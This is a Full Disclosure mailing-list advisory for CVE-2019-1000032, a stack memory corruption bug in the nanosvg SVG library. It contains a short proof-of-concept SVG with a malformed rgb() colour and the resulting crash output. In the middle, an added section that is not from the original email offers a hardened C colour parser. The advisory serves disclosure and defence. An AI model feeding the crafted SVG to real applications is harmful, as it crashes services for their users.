Open Source and information security mailing list archives
Date: Sun, 24 Feb 2019 18:37:01 +0100
From: Sebastian Neef <>
Subject: [FD] CVE-2019-1000032: Memory corruption / DoS in nanosvg

The SVG library nanosvg [0] suffers from a memory corruption bug that can lead to at least DoS. 

The bug exists in the `nsvg__parseColorRGB` function, which can be reached by parsing a malicious SVG file through `nsvgParseFromFile` or `nsvgParse`. This should also affect libraries/packages that provide bindings to nanosvg, for example:

- Lua:
- Python:
- Java:
- Rust:

More information available in the issue [1] and the blogpost [2].

# PoC 

> <svg>
> 	<circle fill="rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)"/>
> </svg>

> $> ./test poc.svg
> *** stack smashing detected ***: <unknown> terminated
> fish: “./test poc.svg” terminated by signal SIGABRT (Abort)
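The stack-protector abort above, triggered by an unbounded run of `%` characters inside `rgb(...)`, is the pattern of a fixed-size stack buffer being filled from attacker-controlled input without a length bound. The following is an added example, not nanosvg's own code and not the patch for this issue: a hypothetical `parse_color_rgb` that reads the `rgb(r, g, b)` / `rgb(r%, g%, b%)` syntax character by character, never copies the input into a temporary buffer, and rejects malformed colour strings (including the PoC string, embedded here as a constructed sample) instead of crashing. It assumes the defect is a length-unbounded copy, which is an inference from the `stack smashing detected` message rather than something the advisory states.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Pack 8-bit components the way an SVG rasteriser typically stores them:
 * 0x00BBGGRR. Hypothetical layout chosen for this example. */
#define RGB_PACK(r, g, b) ((unsigned)(r) | ((unsigned)(g) << 8) | ((unsigned)(b) << 16))

/* Skip blanks; stops at the NUL terminator, so it can never run past the string. */
static const char *skip_ws(const char *p)
{
    while (*p == ' ' || *p == '\t') p++;
    return p;
}

/* Parse one component: decimal digits, optional '%', then ',' (or ')' for the
 * last one). Returns the position after the separator, or NULL if the input
 * is malformed. Nothing is copied into a buffer, so the input length is
 * irrelevant to memory safety; the digit loop is bounded by a value cap. */
static const char *parse_component(const char *p, int *out, int *is_pct, int last)
{
    p = skip_ws(p);
    if (!isdigit((unsigned char)*p)) return NULL;

    long v = 0;
    while (isdigit((unsigned char)*p)) {
        v = v * 10 + (*p - '0');
        if (v > 100000) return NULL;      /* absurd value: reject early, no overflow */
        p++;
    }

    int pct = 0;
    if (*p == '%') { pct = 1; p++; }      /* exactly one '%' is permitted */

    p = skip_ws(p);
    if (*p != (last ? ')' : ',')) return NULL;   /* the PoC fails here: a second '%' */
    p++;

    if (pct) {
        if (v > 100) return NULL;
        v = v * 255 / 100;
    } else if (v > 255) {
        return NULL;
    }
    *out = (int)v;
    *is_pct = pct;
    return p;
}

/* Parse "rgb(r, g, b)" or "rgb(r%, g%, b%)". Returns 1 and stores the packed
 * colour on success, 0 on any malformed input. Never aborts or reads past
 * the terminating NUL. */
int parse_color_rgb(const char *str, unsigned *color)
{
    if (strncmp(str, "rgb(", 4) != 0) return 0;
    const char *p = str + 4;
    int c[3], pct[3];
    for (int i = 0; i < 3; i++) {
        p = parse_component(p, &c[i], &pct[i], i == 2);
        if (!p) return 0;
    }
    /* Mixing percentage and integer components is not valid colour syntax. */
    if (pct[0] != pct[1] || pct[1] != pct[2]) return 0;
    *color = RGB_PACK(c[0], c[1], c[2]);
    return 1;
}

/* Constructed sample inputs: the attribute value from the PoC above, plus
 * two well-formed colours for comparison. */
static const char *const SAMPLES[] = {
    "rgb(0%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%)",
    "rgb(255, 0, 16)",
    "rgb(100%, 50%, 0%)",
};

int main(void)
{
    for (size_t i = 0; i < sizeof SAMPLES / sizeof SAMPLES[0]; i++) {
        unsigned color = 0;
        int ok = parse_color_rgb(SAMPLES[i], &color);
        printf("%-20.20s... -> %s 0x%06x\n", SAMPLES[i], ok ? "ok      " : "rejected", color);
    }
    return 0;
}
```

The point of the design is that the parser's memory footprint is three `int`s regardless of how long the attribute value is; rejecting input is a return value, not a crash, so a malformed file fails closed at the application level rather than taking the process down. When fuzzing a parser such as this, the same PoC string is a useful seed for the corpus.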

# Timeline 
- Late 2018 bug discovered by Sebastian Neef using AFL
- 16th Nov 2018 opened issue [1]
- 19th Feb 2019 CVE assigned by DWF
- 24th Feb 2019 blogpost [2] and email published


Sent through the Full Disclosure mailing list